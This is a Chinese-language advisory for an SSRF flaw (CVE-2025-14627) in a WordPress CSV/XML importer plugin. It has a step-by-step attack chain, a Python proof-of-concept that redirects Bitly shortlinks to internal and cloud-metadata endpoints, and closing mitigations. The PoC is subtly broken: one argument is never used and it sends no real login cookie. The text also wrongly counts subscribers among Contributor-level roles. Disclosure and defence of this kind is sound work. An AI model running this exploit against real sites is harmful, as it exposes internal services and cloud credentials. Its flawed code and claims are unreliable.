CVE-2025-14627 WordPress WP Ultimate CSV Importer插件SSRF漏洞

漏洞信息

漏洞编号

CVE-2025-14627

漏洞类型

服务器端请求伪造 (SSRF)

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WP Import – Ultimate CSV XML Importer for WordPress

漏洞概述

CVE-2025-14627是WordPress插件WP Import – Ultimate CSV XML Importer中的一个服务器端请求伪造（SSRF）漏洞。该插件用于导入CSV和XML数据到WordPress网站。漏洞源于upload_function()方法中对URL验证的不完善处理：虽然初始URL使用wp_http_validate_url()进行验证，但当检测到Bitly短链接时，unshorten_bitly_url()函数会跟随重定向到最终目标URL，而不会重新验证这个最终URL。这使得具有Contributor级别或更高权限的认证攻击者能够迫使服务器向任意内部端点发起HTTP请求，包括本地主机、私有IP范围和云元数据服务（如AWS 169.254.169.254），从而可能暴露敏感内部数据。该漏洞影响7.35及以下所有版本，CVSS评分6.4，属于中等严重程度。

技术细节

漏洞核心问题在于URL验证逻辑的缺陷。在UrlUpload.php文件中，代码首先使用wp_http_validate_url()对用户提供的URL进行验证，但这个验证只针对初始URL。当URL是Bitly短链接时，代码会调用unshorten_bitly_url()函数来解析短链接并跟随重定向到最终目标。然而，这个重定向后的URL没有被重新验证就直接用于发起HTTP请求。攻击者可以注册一个Bitly短链接，指向内部服务如http://localhost、http://127.0.0.1或云元数据端点169.254.169.254/latest/meta-data/。由于服务器-side请求由WordPress服务器发起，攻击者可以绕过防火墙限制访问内部资源。攻击者只需要拥有Contributor角色或更高权限（通常是订阅者、作者、编辑或管理员），即可通过WordPress的媒体上传功能触发该漏洞。漏洞代码位于UrlUpload.php第73行和第290行附近。

攻击链分析

STEP 1

1

攻击者获取WordPress站点 Contributor 级别或更高权限的账户

STEP 2

2

攻击者创建一个Bitly短链接，将其重定向目标设置为内部敏感端点（如http://169.254.169.254/latest/meta-data/或http://localhost）

STEP 3

3

攻击者登录WordPress后台，通过WP Ultimate CSV Importer插件的上传功能提交包含恶意Bitly URL的请求

STEP 4

4

插件的upload_function()方法接收URL，wp_http_validate_url()对初始Bitly URL验证通过

STEP 5

5

unshorten_bitly_url()函数跟随Bitly重定向，获取最终目标URL（内部端点）

STEP 6

6

插件使用未重新验证的最终URL发起HTTP请求，从服务器端访问内部资源

STEP 7

7

内部服务返回敏感数据（如云元数据、本地服务信息），插件将响应返回给攻击者

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# PoC for CVE-2025-14627 - SSRF via Bitly redirect
# Target: WordPress with WP Ultimate CSV Importer plugin <= 7.35

def exploit_ssrf(target_url, bitly_shortlink, internal_target):
    """
    Exploit SSRF by using Bitly shortlink to redirect to internal endpoint
    
    Args:
        target_url: WordPress site URL
        bitly_shortlink: Bitly URL that redirects to internal target
        internal_target: Internal endpoint to access (e.g., http://169.254.169.254)
    """
    
    # Create malicious Bitly shortlink pointing to internal service
    # Example: bit.ly/xxx -> http://169.254.169.254/latest/meta-data/
    
    # Prepare the upload request
    endpoint = f"{target_url}/wp-admin/admin-ajax.php"
    
    files = {
        'file': ('malicious.csv', 'test,data\n1,2', 'text/csv'),
    }
    
    data = {
        'action': 'uploader_ajax',
        'url': bitly_shortlink,  # Bitly shortlink to internal service
        'module': 'upload',
    }
    
    cookies = {
        'wordpress_test_cookie': 'WP+Cookie+check',
    }
    
    try:
        response = requests.post(endpoint, data=data, files=files, cookies=cookies)
        print(f"[*] Request sent to {endpoint}")
        print(f"[*] Response status: {response.status_code}")
        print(f"[*] Response preview: {response.text[:500]}")
        return response.text
    except Exception as e:
        print(f"[!] Error: {e}")
        return None

if __name__ == "__main__":
    if len(sys.argv) < 4:
        print("Usage: python cve-2025-14627.py <target_url> <bitly_shortlink> <internal_target>")
        print("Example: python cve-2025-14627.py http://victim.com http://bit.ly/abc123 http://169.254.169.254/latest/meta-data/")
        sys.exit(1)
    
    target = sys.argv[1]
    bitly = sys.argv[2]
    internal = sys.argv[3]
    
    exploit_ssrf(target, bitly, internal)

影响范围

WP Import – Ultimate CSV XML Importer for WordPress <= 7.35

防御指南

临时缓解措施

如果无法立即升级插件，可采取以下临时缓解措施：1）限制WordPress用户的角色分配，确保只有完全可信的用户才能拥有Contributor或更高权限；2）在Web应用防火墙（WAF）或网络层配置规则，阻止服务器对内部IP范围（10.0.0.0/8、172.16.0.0/12、192.168.0.0/16）和云元数据端点（169.254.169.254）的出站HTTP请求；3）监控服务器日志，关注异常的内部网络请求行为；4）考虑暂时禁用WP Ultimate CSV Importer插件，直到完成安全更新。